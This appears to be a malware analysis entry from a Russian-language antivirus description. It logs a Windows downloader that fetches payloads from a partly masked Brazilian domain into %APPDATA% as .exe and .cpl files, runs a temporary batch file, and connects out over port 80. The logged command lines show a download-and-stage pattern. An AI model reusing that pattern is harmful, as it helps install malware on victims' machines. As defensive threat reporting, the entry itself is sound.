Техническая информация
- '%APPDATA%\show.exe' http://www.ln###ero.com.br/atualizacao/dsc1500.rst "%APPDATA%\start.exe"
- '%APPDATA%\start.cpl'
- '%APPDATA%\show.exe' ttp://www.ln###ero.com.br/atualizacao/cont.rst "%APPDATA%\cont.cpl"
- '%APPDATA%\begin.exe'
- '%APPDATA%\show.exe' http://www.ln###ero.com.br/atualizacao/start.rst "%APPDATA%\start.cpl"
- '%APPDATA%\start.cpl' (загружен из сети Интернет)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\begin.bat" "
- %APPDATA%\start.cpl
- %APPDATA%\cont.cpl
- %APPDATA%\start.exe
- %APPDATA%\show.exe
- %APPDATA%\begin.exe
- %TEMP%\1.tmp\begin.bat
- %TEMP%\1.tmp\begin.bat
- %APPDATA%\show.exe
- 'www.ln###ero.com.br':80
- www.ln###ero.com.br/atualizacao/dsc1500.rst
- www.ln###ero.com.br/atualizacao/cont.rst
- www.ln###ero.com.br/atualizacao/start.rst
- DNS ASK www.ln###ero.com.br
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''